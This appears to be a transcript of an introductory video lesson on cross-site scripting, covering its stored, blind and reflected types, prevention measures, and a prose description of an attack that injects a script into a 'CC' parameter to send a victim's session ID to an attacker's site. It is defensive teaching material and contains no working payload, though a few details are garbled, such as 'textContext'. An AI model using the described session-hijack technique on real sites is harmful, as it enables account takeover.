# What you'll learn

After watching this video, you will be able to: 
* Describe cross-site scripting.
* Identify the types of cross-site scripting.
* Explain how to prevent cross-site scripting attacks.

# What is cross-site scripting?

Cross-site scripting is when an application takes untrusted data and then sends it to a web browser without proper validation or escaping.
* Attackers use cross-site scripting to execute scripts in the victim’s browser.
* You may see cross-site scripting represented as "XSS". 

![image.png](attachment:9f1add02-c6c0-476f-a954-306a840886af.png)

Cross-site scripting can attack in different ways.
* For instance, cross-site scripting can enable attackers to hijack user sessions.
* A cross-site scripting attack can deface websites by replacing or removing images or content.
* Cross-site scripting can redirect users from a trusted website to a malicious website.

# Types of cross-site scripting

![image.png](attachment:d38ab842-101d-44d2-8931-e35e37707645.png)

Three common types of cross-site scripting attacks are **stored**, **blind**, and **reflected**.

A **stored cross-site scripting** attack injects a script that becomes permanently stored in a database or a targeted server.
	• When a victim retrieves the malicious script, it requests information stored on the server.
	• Stored cross-site scripting is also referred to as persistent cross-site scripting.

Next, **blind cross-site scripting** injects a script that has a payload to be executed on the backend of an application by the user or the administrator without their knowing about it.
	• The payload may compromise the application or the server.
	• It may even attack the user.

A **reflected cross-site scripting** attack injects a script to be reflected from the attacked server to users on a system.

Delivering phishing email messages with malicious links that can compromise many victims is an example of a reflected cross-site scripting attack.

# Preventing XSS attack

![image.png](attachment:a0e1a65d-7ca8-4457-8dbb-bb3fb377b704.png)

You can protect your application against cross-site scripting attacks with these preventative measures.
* One measure is to look for suspicious HTTP requests and keywords that can trigger a scripting engine.
* Two examples are banned HTML tags and escape sequences.
* Another preventative measure is to escape lists or keywords that seem suspect or block special characters.
* It's a good idea to turn off HTTP TRACE support on a web server to eliminate HTTP TRACE calls that can collect user cookies and send them to a malicious server.
* Avoid unsafe sinks, which are functions or variables on web pages.
* You should refactor code to remove references to unsafe sinks such as innerHTML or better yet, use textContext or values.

# XSS hijack attack scenario

![image.png](attachment:b619fcd8-c0db-49fb-bb93-08b8ceb335e0.png)

Here’s an example of a cross-site scripting attack.
* This is where the attacker is able to inject a script from another site into your site.
* The code here is a variable called page with the plus- equal concatenator.
* It has a string of HTML with an input field, with a name of credit card, a type of text, and a value, that again, is a function call to request get parameters, "CC". 
* The problem is, you are concatenating strings here.
* Instead of providing a credit card number, an attacker can enter JavaScript! 
* The attacker can modify the "CC" parameter and substitute a script tag.
* Then document location becomes the payload for the attacker's site in the CGI bin call.
* This causes the victim's session ID to be sent to the attacker's website, which allows the attacker to hijack the user's current session.

# Summary

In this video, you learned that:
* Cross-site scripting is when an application sends untrusted data to a browser.
* Attackers use cross-site scripting to execute scripts in their victim’s browser.
* Three common cross-site scripting attacks are stored, blind, and reflected.
* And preventative measures include looking for suspicious HTTP requests, escaping lists, disabling HTTP TRACE, and avoiding unsafe sinks.